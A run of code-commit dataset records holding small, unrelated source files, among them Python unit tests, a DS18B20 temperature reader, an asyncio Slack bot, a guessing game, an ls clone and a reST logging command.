        CONTAINERS["webdevops/%s"%dockerImage] = data.get('image')
def main(args):
    """Walk the Dockerfile tree and print a parent/child image graph (DOT)."""
    dockerfilePath = os.path.abspath(args.dockerfile)
    u = Digraph('webdevops', filename='webdevops.gv')
    u.body.append('size="10,10"')
    u.body.append(r'label = "\n\nWebdevops Containers\n at :%s"' % get_current_date() )
    u.node_attr.update(color='lightblue2', style='filled', shape='box')
    # Parse Docker file
    for root, dirs, files in os.walk(dockerfilePath):
        for file in files:
            if file.endswith("Dockerfile"):
                processDockerfile(os.path.join(root, file))
    # Build and render graph
    for image, base in CONTAINERS.items():
        # Only draw edges between in-house images; images with an external
        # base become standalone nodes.
        if "webdevops" in base:
            u.edge(base, image)
        else:
            u.node(image)
    # Python 2 print statement: emit the DOT source to stdout.
    print u.source
if __name__ == '__main__':
    # Single CLI argument: the root directory to scan for Dockerfiles.
    parser = argparse.ArgumentParser()
    parser.add_argument('-d','--dockerfile' ,help='',type=str)
    args = parser.parse_args()
    main(args)
| mit | Python | |
77b7b4603466c390bf2dc61428c64e85f7babbb0 | create a new file test_cut_milestone.py | WheatonCS/Lexos,WheatonCS/Lexos,WheatonCS/Lexos | test/unit_test/test_cut_milestone.py | test/unit_test/test_cut_milestone.py | from lexos.processors.prepare.cutter import cut_by_milestone
class TestMileStone:
    """Unit tests for cut_by_milestone: splitting text on a milestone string."""

    def test_milestone_regular(self):
        # The milestone itself is removed from the returned segments.
        text_content = "The bobcat slept all day.."
        milestone = "bobcat"
        assert cut_by_milestone(text_content, milestone) == ["The ",
                                                            " slept all day.."
                                                            ]

    def test_milestone_no_milestone_in_text(self):
        # No match: the whole text comes back as a single segment.
        text_content = "The bobcat slept all day."
        milestone = "am"
        assert cut_by_milestone(text_content, milestone) == [
            "The bobcat slept all day."]

    def test_milestone_longer_than_text(self):
        text_content = "The bobcat slept all day."
        milestone = "The cute bobcat slept all day."
        assert cut_by_milestone(text_content, milestone) == [
            "The bobcat slept all day."]

    def test_milestone_len_zero(self):
        # An empty milestone is treated as "no milestone".
        text_content = "The bobcat slept all day."
        milestone = ""
        assert cut_by_milestone(text_content, milestone) == [
            "The bobcat slept all day."]

    def test_milestone_empty_text(self):
        text_content = ""
        milestone = "bobcat"
        assert cut_by_milestone(text_content, milestone) == []

    def test_milestone_check_case_sensative(self):
        # Matching is case sensitive, so 'BOBCAT' never matches. (The
        # expected list holds ONE string: adjacent literals concatenate.)
        text_content = "The bobcat slept all day."
        milestone = "BOBCAT"
        assert cut_by_milestone(text_content, milestone) == ["The bobcat "
                                                            "slept all day."]

    def test_milestone_whole_text_milestone(self):
        # Milestone equal to the whole text leaves nothing behind.
        text_content = "The bobcat slept all day."
        milestone = "The bobcat slept all day."
        assert cut_by_milestone(text_content, milestone) == []
| mit | Python | |
3284a384a4147857c16462c0fde6a4dec39de2b7 | Read temperature | AnaviTech/anavi-examples,AnaviTech/anavi-examples | 1-wire/ds18b20/python/ds18b20.py | 1-wire/ds18b20/python/ds18b20.py | import glob
import time
base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28*')[0]
device_file = device_folder + '/w1_slave'
def read_temp_raw():
    """Return the raw lines of the DS18B20's 1-wire sysfs slave file."""
    # Context manager guarantees the file handle is closed even when
    # readlines() raises; the original leaked the handle in that case.
    with open(device_file, 'r') as f:
        return f.readlines()
def read_temp():
    """Poll the sensor until a valid reading appears; return degrees Celsius."""
    lines = read_temp_raw()
    # The first line ends in 'YES' when the reading's CRC check passed;
    # retry every 200 ms until it does.
    while lines[0].strip()[-3:] != 'YES':
        time.sleep(0.2)
        lines = read_temp_raw()
    equals_pos = lines[1].find('t=')
    if -1 != equals_pos:
        # The kernel reports millidegrees after 't='.
        temp_string = lines[1][equals_pos+2:]
        return float(temp_string) / 1000.0
    # NOTE(review): implicitly returns None when 't=' is missing, which
    # crashes the arithmetic at module level — consider raising instead.
# Read once at import time and report in both Celsius and Fahrenheit.
temperatureC = read_temp()
temperatureF = temperatureC * 9.0 / 5.0 + 32.0
print("Temperature: %.2fC (%.2fF)" % (temperatureC, temperatureF))
| mit | Python | |
89a65c75ade2629e2b67a9887e27a177617dd39e | add armes | PolySlug/polyslug | armes/armes.py | armes/armes.py | class Arme(object) :
def __init__(self):
'''Caracteristiques de la classe arme'''
pass
def tirer(self, position, vecteur) :
'''cree et envoie un projectile dans une direction'''
pass | mit | Python | |
244b7a3b8d3bd32517effdd4b7bab35628a6db61 | move init db | anokata/pythonPetProjects,anokata/pythonPetProjects,anokata/pythonPetProjects,anokata/pythonPetProjects | flask_again/init_db.py | flask_again/init_db.py | from aone_app.db import init_db
init_db()
| mit | Python | |
d054178a75caecfb20a5c4989dc4e9cd7bf4a853 | add grayscale conversion test - refs #1454 | qianwenming/mapnik,garnertb/python-mapnik,Airphrame/mapnik,lightmare/mapnik,Uli1/mapnik,zerebubuth/mapnik,mapycz/python-mapnik,stefanklug/mapnik,Mappy/mapnik,rouault/mapnik,rouault/mapnik,yohanboniface/python-mapnik,pramsey/mapnik,Uli1/mapnik,kapouer/mapnik,mbrukman/mapnik,stefanklug/mapnik,mapycz/mapnik,lightmare/mapnik,mbrukman/mapnik,whuaegeanse/mapnik,rouault/mapnik,pramsey/mapnik,strk/mapnik,cjmayo/mapnik,lightmare/mapnik,mapnik/python-mapnik,naturalatlas/mapnik,pnorman/mapnik,sebastic/python-mapnik,manz/python-mapnik,pnorman/mapnik,yiqingj/work,sebastic/python-mapnik,pnorman/mapnik,sebastic/python-mapnik,jwomeara/mapnik,tomhughes/mapnik,mbrukman/mapnik,Mappy/mapnik,qianwenming/mapnik,zerebubuth/mapnik,strk/mapnik,yohanboniface/python-mapnik,tomhughes/mapnik,strk/mapnik,CartoDB/mapnik,stefanklug/mapnik,CartoDB/mapnik,mapnik/mapnik,Uli1/mapnik,strk/mapnik,yohanboniface/python-mapnik,manz/python-mapnik,zerebubuth/mapnik,qianwenming/mapnik,CartoDB/mapnik,davenquinn/python-mapnik,qianwenming/mapnik,davenquinn/python-mapnik,pramsey/mapnik,kapouer/mapnik,Airphrame/mapnik,mbrukman/mapnik,pnorman/mapnik,manz/python-mapnik,rouault/mapnik,mapnik/mapnik,naturalatlas/mapnik,tomhughes/python-mapnik,garnertb/python-mapnik,tomhughes/mapnik,tomhughes/mapnik,lightmare/mapnik,cjmayo/mapnik,yiqingj/work,Airphrame/mapnik,garnertb/python-mapnik,naturalatlas/mapnik,jwomeara/mapnik,cjmayo/mapnik,mapnik/python-mapnik,jwomeara/mapnik,kapouer/mapnik,tomhughes/python-mapnik,mapycz/python-mapnik,davenquinn/python-mapnik,Airphrame/mapnik,mapnik/mapnik,yiqingj/work,jwomeara/mapnik,yiqingj/work,whuaegeanse/mapnik,naturalatlas/mapnik,whuaegeanse/mapnik,kapouer/mapnik,stefanklug/mapnik,tomhughes/python-mapnik,whuaegeanse/mapnik,Mappy/mapnik,cjmayo/mapnik,mapycz/mapnik,Mappy/mapnik,mapnik/mapnik,mapycz/mapnik,pramsey/mapnik,qianwenming/mapnik,Uli1/mapnik,mapnik/python-mapnik | 
tests/python_tests/grayscale_test.py | tests/python_tests/grayscale_test.py | import mapnik
from nose.tools import *
def test_grayscale_conversion():
    # A white image run through set_grayscale_to_alpha should come out fully
    # opaque: the alpha byte (bits 24-31) of the sampled pixel must be 255.
    im = mapnik.Image(2,2)
    im.background = mapnik.Color('white')
    im.set_grayscale_to_alpha()
    pixel = im.get_pixel(0,0)
    eq_((pixel >> 24) & 0xff,255);
if __name__ == "__main__":
[eval(run)() for run in dir() if 'test_' in run]
| lgpl-2.1 | Python | |
a76d8287d5ad0b9d43c4b509b2b42eb0a7fa03a2 | Add asyncio slackbot | voidabhi/python-scripts,voidabhi/python-scripts,voidabhi/python-scripts,voidabhi/python-scripts,voidabhi/python-scripts | slackbot_asyncio.py | slackbot_asyncio.py | import asyncio
import json
import signal
import aiohttp
from config import DEBUG, TOKEN
import websockets
RUNNING = True
async def api_call(method, data=None, file=None, token=TOKEN):
    """Perform an API call to Slack.

    :param method: Slack API method name.
    :param type: str
    :param data: Form data to be sent.
    :param type: dict
    :param file: file pointer to send (for files.upload).
    :param type: file
    :param token: OAuth2 token
    :param type: str
    """
    # NOTE(review): ClientSession is asynchronous and should be entered with
    # `async with` — confirm against the aiohttp version in use.
    with aiohttp.ClientSession() as session:
        # Slack's web API takes form-encoded POSTs; the token rides along
        # as an ordinary form field.
        form = aiohttp.FormData(data or {})
        form.add_field("token", token)
        if file:
            form.add_field("file", file)
        async with session.post('https://slack.com/api/{0}'.format(method),
                                data=form) as response:
            assert 200 == response.status, ("{0} with {1} failed."
                                            .format(method, data))
            return await response.json()
async def producer(send, timeout=20):
    """Enqueue a serialized ping message every *timeout* seconds.

    :param send: awaitable accepting one message (here: asyncio.Queue.put).
    :param timeout: seconds to sleep between pings.
    """
    while RUNNING:
        await asyncio.sleep(timeout)
        # BUG FIX: `send` is Queue.put, which is a coroutine — the original
        # called it without awaiting, so the ping was never enqueued. The
        # payload is JSON-encoded here because bot() forwards queue items
        # straight to ws.send(), which expects str/bytes, not a dict.
        await send(json.dumps({"type": "ping"}))
async def consumer(message):
    """Consume the message by printing it."""
    message = json.loads(message)
    # Only chat messages are printed; the user id is resolved to a display
    # name with an extra users.info call.
    if message.get('type') == 'message':
        user_info = await api_call('users.info',
                                   dict(user=message.get('user')))
        print("{user[user][name]}: {message[text]}"
              .format(user=user_info, message=message))
async def bot(get, token=TOKEN):
    """Create a bot that joins Slack.

    :param get: awaitable yielding the next outgoing message (Queue.get).
    """
    # Open a Real Time Messaging session and connect to its websocket URL.
    rtm = await api_call("rtm.start")
    assert 'ok' in rtm and rtm['ok'], "Error connecting to RTM."
    async with websockets.connect(rtm["url"]) as ws:
        while RUNNING:
            # Race an incoming websocket frame against the outgoing queue;
            # handle whichever finishes first and cancel the loser.
            listener_task = asyncio.ensure_future(ws.recv())
            producer_task = asyncio.ensure_future(get())
            done, pending = await asyncio.wait(
                [listener_task, producer_task],
                return_when=asyncio.FIRST_COMPLETED
            )
            for task in pending:
                task.cancel()
            if listener_task in done:
                # Inbound frame: process it concurrently, don't block here.
                message = listener_task.result()
                asyncio.ensure_future(consumer(message))
            if producer_task in done:
                message = producer_task.result()
                await ws.send(message)
def stop():
    """Gracefully stop the bot."""
    # Flip the module-level flag polled by bot() and producer(); both loops
    # exit on their next iteration.
    global RUNNING
    RUNNING = False
    print("Stopping... closing connections.")
if __name__ == "__main__":
loop = asyncio.get_event_loop()
outbox = asyncio.Queue()
loop.set_debug(DEBUG)
loop.add_signal_handler(signal.SIGINT, stop)
loop.run_until_complete(asyncio.wait((bot(outbox.get),
producer(outbox.put))))
loop.close()
| mit | Python | |
f4ed2ec503bc12fe645b6d79a330787d2dde6c8e | Bump version 0.15.0rc7 --> 0.15.0rc8 | zestyr/lbry,lbryio/lbry,zestyr/lbry,lbryio/lbry,zestyr/lbry,lbryio/lbry | lbrynet/__init__.py | lbrynet/__init__.py | import logging
__version__ = "0.15.0rc8"
version = tuple(__version__.split('.'))
logging.getLogger(__name__).addHandler(logging.NullHandler())
| import logging
__version__ = "0.15.0rc7"
version = tuple(__version__.split('.'))
logging.getLogger(__name__).addHandler(logging.NullHandler())
| mit | Python |
1f1da12d49b9aa9b28a937fdf877bb990eb0bd2a | add convenience script to sync local from test | DOAJ/doaj,DOAJ/doaj,DOAJ/doaj,DOAJ/doaj | scratchpad/sync/sync_from_remote.py | scratchpad/sync/sync_from_remote.py | import esprit
from portality.core import app
remote = esprit.raw.Connection("http://ooz.cottagelabs.com:9200", "doaj")
local = esprit.raw.Connection("http://localhost:9200", "doaj")
esprit.tasks.copy(remote, "journal", local, "journal")
esprit.tasks.copy(remote, "account", local, "account")
esprit.tasks.copy(remote, "article", local, "article")
esprit.tasks.copy(remote, "suggestion", local, "suggestion")
esprit.tasks.copy(remote, "upload", local, "upload")
esprit.tasks.copy(remote, "cache", local, "cache")
esprit.tasks.copy(remote, "toc", local, "toc")
esprit.tasks.copy(remote, "lcc", local, "lcc")
esprit.tasks.copy(remote, "article_history", local, "article_history")
esprit.tasks.copy(remote, "editor_group", local, "editor_group")
esprit.tasks.copy(remote, "news", local, "news")
esprit.tasks.copy(remote, "lock", local, "lock")
esprit.tasks.copy(remote, "bulk_reapplication", local, "bulk_reapplication")
esprit.tasks.copy(remote, "bulk_upload", local, "bulk_upload")
esprit.tasks.copy(remote, "journal_history", local, "journal_history")
| apache-2.0 | Python | |
9d7166e489b425acd64e1294236a821d76270cfc | Create letter_game_v1.1.py | hrahadiant/mini_py_project | letter_game_v1.1.py | letter_game_v1.1.py | # only guess a single letter
# only guess an alphabetic
# user can play again
# strikes max up to 7
# draw guesses letter, spaces, and strikes
import random
# Candidate secret words for the guessing game.
words = [
    'cow',
    'cat',
    'crocodile',
    'lion',
    'tiger',
    'mouse',
    'goat',
    'giraffe',
    'elephant',
    'dear',
    'eagle',
    'bear'
]

# One iteration per game; only 'q' at the prompt exits.
while True:
    start = input("Press enter to play or q to quit ").lower()
    if start == 'q':
        break

    secret_word = random.choice(words)
    bad_guesses = []
    good_guesses = []
    # BUG FIX: the win condition used to compare counts
    # (len(good_guesses) != len(list(secret_word))), but words with repeated
    # letters ('elephant', 'crocodile', 'giraffe') have fewer distinct
    # letters than characters, so those words could never be won. Comparing
    # letter *sets* fixes that.
    letters_needed = set(secret_word)

    # One iteration per guess, until 7 strikes or every letter is found.
    while len(bad_guesses) < 7 and set(good_guesses) != letters_needed:
        # Draw the current state: found letters in place, dots elsewhere.
        for letter in secret_word:
            if letter in good_guesses:
                print(letter, end='')
            else:
                print('.', end='')
        print('')
        print('Strikes {}/7'.format(len(bad_guesses)))

        # Lowercase the guess so capital letters match the lowercase words
        # (previously an uppercase guess could never match).
        guess = input("Guess a letter: ").lower()

        if len(guess) != 1:
            print("You can only guess a single letter.")
            continue
        elif guess in good_guesses or guess in bad_guesses:
            print("You already guess that letter.")
            continue
        elif not guess.isalpha():
            print("You can only guess a letter.")
            continue

        if guess in secret_word:
            good_guesses.append(guess)
            if set(good_guesses) == letters_needed:
                print("You win! The word was {}".format(secret_word))
                break
        else:
            bad_guesses.append(guess)
    else:
        # The inner loop ran out of strikes without a winning break.
        print("You lost! The secret word was {}".format(secret_word))
    continue
| apache-2.0 | Python | |
e1021970c445acd8ba3acc24294611bebc63bc5a | test if weather forecast saves data in the db | SEC-i/ecoControl,SEC-i/ecoControl,SEC-i/ecoControl | server/forecasting/tests/test_weather_forecast.py | server/forecasting/tests/test_weather_forecast.py | #import unittest
from server.forecasting.forecasting.weather import WeatherForecast
from django.test import TestCase
#from server.models import Device, Sensor, SensorEntry
''''class ForecastingTest(unittest.TestCase):
def test_test(self):
cast = WeatherForecast()
'''
class ForecastingDBTest(TestCase):
    """Checks that crawled weather-forecast data is persisted to the database."""

    def test_crawled_data_in_data(self):
        # TODO: placeholder — assert that WeatherForecast's crawl writes
        # sensor entries once the feature is implemented.
        pass

# NOTE(review): `unittest` is never imported (the import at the top of the
# file is commented out), so running this module directly raises NameError.
if __name__ == '__main__':
    unittest.main()
| mit | Python | |
7f9b2cfc5605333960b20d1f0c151d966819a53b | correct SQL bug with metadata update | akrherz/idep,akrherz/dep,akrherz/dep,akrherz/idep,akrherz/idep,akrherz/idep,akrherz/dep,akrherz/dep,akrherz/dep,akrherz/idep,akrherz/idep | scripts/RT/flowpathlength_totals.py | scripts/RT/flowpathlength_totals.py | """Examination of erosion totals vs flowpath length"""
import pandas as pd
import os
import datetime
import multiprocessing
import sys
import numpy as np
import psycopg2
from tqdm import tqdm
from pyiem import dep as dep_utils
def find_huc12s():
    """Return a list of HUC12 codes for the scenario that touch Iowa."""
    pgconn = psycopg2.connect(database='idep', host='iemdb', user='nobody')
    cursor = pgconn.cursor()
    cursor.execute("""
    SELECT huc_12 from huc12 WHERE scenario = %s
    and states ~* 'IA'
    """, (SCENARIO,))
    res = []
    for row in cursor:
        res.append(row[0])
    return res
def readfile(huc12, fn):
    """Read one WEPP env file and annotate it with flowpath key, length
    and per-length sediment delivery."""
    frame = dep_utils.read_env(fn)
    # Filenames look like <huc12>_<fpath>.env; recover the flowpath number.
    fpath = int(fn.split("/")[-1].split(".")[0].split("_")[1])
    key = "%s_%s" % (huc12, fpath)
    flen = lengths[key]
    frame['delivery'] = frame['sed_del'] / flen
    frame['flowpath'] = key
    frame['length'] = flen
    return frame
def do_huc12(huc12):
    """Concatenate every env-file dataframe for one HUC12.

    Returns a (dataframe_or_None, huc12, file_count) tuple so the caller
    can report HUC12s that produced no output.
    """
    basedir = "/i/%s/env/%s/%s" % (SCENARIO, huc12[:8], huc12[8:])
    if not os.path.isdir(basedir):
        return None, huc12, 0
    frames = []
    for fname in os.listdir(basedir):
        frames.append(readfile(huc12, basedir + "/" + fname))
    if not frames:
        return None, huc12, 0
    return pd.concat(frames), huc12, len(frames)
def compute_res(df, date, huc12, slopes, qc_precip):
    """Summarize one HUC12/day dataframe into a flat stats dict.

    For each quantity (precip, detachment loss, runoff, delivery) the dict
    carries min/avg/max keyed as e.g. ``min_precip``.  ``slopes`` is the
    total number of flowpaths; averages divide by it so flowpaths missing
    from ``df`` count as zero, and the minimum is forced to 0 unless every
    flowpath is present in ``df``.
    """
    complete = (slopes == len(df.index))
    divisor = float(slopes)
    res = dict(date=date, huc12=huc12, qc_precip=qc_precip)
    for column, label in [('precip', 'precip'), ('av_det', 'loss'),
                          ('runoff', 'runoff'), ('delivery', 'delivery')]:
        series = df[column]
        res['min_%s' % label] = series.min() if complete else 0
        res['avg_%s' % label] = series.sum() / divisor
        res['max_%s' % label] = series.max()
    return res
def load_lengths():
    """Map '<huc12>_<fpath>' identifiers to flowpath geometry lengths."""
    conn = psycopg2.connect(database='idep', host='iemdb')
    cur = conn.cursor()
    cur.execute("""
    SELECT huc_12, fpath, ST_Length(geom) from flowpaths where
    scenario = %s
    """, (SCENARIO,))
    return dict(("%s_%s" % (row[0], row[1]), row[2]) for row in cur)
if __name__ == '__main__':
    # We are ready to do stuff!
    # We need to keep stuff in the global namespace to keep multiprocessing
    # happy, at least I think that is the reason we do this
    # (worker processes presumably read SCENARIO/lengths as globals
    # inherited on fork -- confirm on non-fork platforms).
    SCENARIO = sys.argv[1]
    lengths = load_lengths()
    huc12s = find_huc12s()
    # Begin the processing work now!
    pool = multiprocessing.Pool()
    # imap_unordered yields results as workers finish; tqdm shows a
    # progress bar only when stdout is a TTY.
    for (df, huc12, slopes) in tqdm(pool.imap_unordered(do_huc12, huc12s),
                                    total=len(huc12s),
                                    disable=(not sys.stdout.isatty())):
        if df is None:
            print("ERROR: huc12 %s returned 0 data" % (huc12,))
            continue
        # NOTE(review): assumes a 'dfs/' directory already exists in the
        # working directory -- confirm, otherwise to_csv fails.
        df.to_csv('dfs/%s.csv' % (huc12,))
| mit | Python | |
f7d88f43779f94dc2623e4726bd50f997104865f | add compress-the-string | zeyuanxy/hacker-rank,EdisonCodeKeeper/hacker-rank,zeyuanxy/hacker-rank,EdisonAlgorithms/HackerRank,EdisonAlgorithms/HackerRank,EdisonCodeKeeper/hacker-rank,EdisonCodeKeeper/hacker-rank,EdisonCodeKeeper/hacker-rank,zeyuanxy/hacker-rank,EdisonAlgorithms/HackerRank,EdisonAlgorithms/HackerRank,zeyuanxy/hacker-rank,EdisonAlgorithms/HackerRank,EdisonAlgorithms/HackerRank,zeyuanxy/hacker-rank,EdisonCodeKeeper/hacker-rank,EdisonCodeKeeper/hacker-rank,zeyuanxy/hacker-rank | contest/pythonist3/compress-the-string/compress-the-string.py | contest/pythonist3/compress-the-string/compress-the-string.py | # -*- coding: utf-8 -*-
# @Author: Zeyuan Shang
# @Date: 2016-05-13 12:35:11
# @Last Modified by: Zeyuan Shang
# @Last Modified time: 2016-05-13 12:35:16
# groupby collapses the input into runs of consecutive equal characters.
from itertools import groupby
# Python 2 script: raw_input() reads the string to compress from stdin.
s = raw_input()
# Emit "(run_length, char)" pairs on a single line for each run.
for k, g in groupby(s):
print '({}, {})'.format(len(list(g)), k), | mit | Python | |
bf7bfce64b2964cd6adb515788420747fcbedeae | Add an app.wsgi just in case | markpasc/leapreader,markpasc/leapreader | app.wsgi | app.wsgi | #!/usr/bin/env python
import itty
# Importing leapreader presumably registers its itty route handlers as an
# import side effect -- confirm routes are defined at module import time.
import leapreader
# Module-level WSGI callable that the WSGI server looks up; itty's
# handle_request dispatches incoming requests to the registered routes.
app = itty.handle_request
| mit | Python | |
ada3083c38fe75f139079e93b7c544540fe95e1a | add sources/ package | IuliiSe/openinterests.eu,IuliiSe/openinterests.eu,civicdataeu/openinterests.eu,yaph/openinterests.eu,yaph/openinterests.eu,civicdataeu/openinterests.eu,IuliiSe/openinterests.eu,civicdataeu/openinterests.eu | sources/__init__.py | sources/__init__.py | import sqlaload as sl
from lobbyfacts.core import app
def etl_engine():
    """Open a sqlaload connection to the database named by ETL_URL."""
    etl_url = app.config.get('ETL_URL')
    return sl.connect(etl_url)
| mit | Python | |
78a8fef6123b81011b3d896af69470d249570b05 | Add ls.py | chrhsmt/system_programming,chrhsmt/system_programming,chrhsmt/system_programming,chrhsmt/system_programming | kadai3/ls.py | kadai3/ls.py | # -*- coding: utf-8 -*-
import sys
import os
import time
import argparse
import re
from tarfile import filemode
import pwd
import grp
# Command-line interface: an optional target path plus ls-style flags.
parser = argparse.ArgumentParser()
parser.add_argument("path",
                    metavar="path",
                    nargs="?",
                    default="",
                    type=str,
                    help="expect shown directory")
# -a: also list hidden entries plus "." and ".."
parser.add_argument("-a",
                    action="store_true",
                    default=False)
# -i: prefix each entry with its inode number
parser.add_argument("-i",
                    action="store_true",
                    default=False)
# -l: long listing (mode, links, owner, group, size, mtime)
parser.add_argument("-l",
                    action="store_true",
                    default=False)
args = parser.parse_args()
# Matches hidden entries: any name beginning with a dot.
pattern = re.compile(r'^\..*$')
try:
dir_list = os.listdir("./%s" % args.path)
except OSError as (errorno, error):
sys.exit("python %s: %s: %s" % (sys.argv[0], args.path, error))
if not args.a:
for src in dir_list[:]:
if pattern.match(src):
dir_list.remove(src)
else:
dir_list = [".", ".."] + dir_list
if args.l:
for src in dir_list:
stat = os.stat(args.path + src)
uname = pwd.getpwuid(stat.st_uid).pw_name
gname = grp.getgrgid(stat.st_gid).gr_name
mtime = time.strftime("%m %d %H:%M", time.localtime(stat.st_mtime))
inode = stat.st_ino
if args.i:
print "%s %s %2s %s %s %5d %s %s" % (stat.st_ino, filemode(stat.st_mode), stat.st_nlink, uname, gname, stat.st_size, mtime, src)
else:
print "%s %2s %s %s %5d %s %s" % (filemode(stat.st_mode), stat.st_nlink, uname, gname, stat.st_size, mtime, src)
else:
if args.i:
print "\t".join([ "%s %s" % (os.stat(args.path + src).st_ino, src) for src in dir_list])
else:
print "\t".join(dir_list) | mit | Python | |
0223ae91b669ce12b16d8b89456f3291eeed441e | Add log command. | kivhift/qmk,kivhift/qmk | src/commands/log.py | src/commands/log.py | #
# Copyright (c) 2012 Joshua Hughes <kivhift@gmail.com>
#
import os
import subprocess
import tempfile
import threading
import qmk
import pu.utils
class LogCommand(qmk.Command):
    '''Make log entries using restructured text.'''
    def __init__(self):
        # NOTE(review): passing self to the base initializer looks like a
        # typo for __init__() -- confirm qmk.Command's expected signature.
        super(LogCommand, self).__init__(self)
        self._name = 'log'
        self._help = self.__doc__
        self._ui = pu.utils.get_user_info()
        # All log entries live under <qmk base dir>/logs; create it once.
        self._base_dir = os.path.join(qmk.base_dir(), 'logs')
        if not os.path.exists(self._base_dir):
            os.mkdir(self._base_dir, 0755)

    @qmk.capture_and_show_exceptions('log')
    def _make_entry(self, type_):
        '''Open the user's editor on a temp file and append the result to
        the monthly reST log for *type_* (e.g. "work").  Runs on a worker
        thread started by action().'''
        _, entry_tmp_file = tempfile.mkstemp(
            prefix = type_, suffix = '.rst', dir = self._base_dir)
        # mkstemp also returns an open descriptor; close it so the editor
        # owns the file exclusively.
        os.close(_)

        start_time = pu.utils.ISO_8601_time_stamp()
        # Blocks until the editor process exits.
        subprocess.call([self._ui.EDITOR, entry_tmp_file])
        end_time = pu.utils.ISO_8601_time_stamp()

        # Nothing was written: treat as an aborted entry and clean up.
        if 0 == os.stat(entry_tmp_file).st_size:
            os.remove(entry_tmp_file)
            return

        entry_dir = os.path.join(self._base_dir, type_)
        if not os.path.exists(entry_dir):
            os.mkdir(entry_dir, 0755)

        # Entries are grouped one file per type and month: <type>-<YYYY-MM>.rst.
        # YM is the YYYY-MM prefix of the ISO-8601 start timestamp.
        st = start_time.split('-')
        YM = '-'.join(st[:2])
        entry_file = os.path.join(entry_dir, '%s-%s.rst' % (type_, YM))
        # Only a brand-new (or empty) monthly file gets the reST title block.
        write_title = (
            not os.path.exists(entry_file)
            or 0 == os.stat(entry_file).st_size)
        with open(entry_file, 'ab') as fout:
            if write_title:
                title = '%s log for %s' % (type_, YM)
                fout.write('\n'.join((title, '=' * len(title), '', '')))
            with open(entry_tmp_file, 'rb') as fin:
                # Each entry becomes a reST section headed by its start time.
                fout.write('\n'.join(
                    (start_time, '-' * len(start_time), '', '')))
                for ln in fin:
                    fout.write(ln.rstrip() + '\n')
                # Record when editing finished as a reST comment.
                fout.write('\n'.join(
                    ('', '.. Editing finished: ' + end_time, '', '')))
        os.remove(entry_tmp_file)

    def action(self, arg):
        '''Handle the "log" command; *arg* names the log type ("work" when
        omitted).'''
        if arg is None:
            subj = 'work'
        else:
            subj = arg.strip()
        # Don't want to block so fire off a thread to do the actual work.
        threading.Thread(target = self._make_entry, args = (subj,)).start()
def commands():
    '''Return the command objects contributed by this module.'''
    return [LogCommand()]
| mit | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.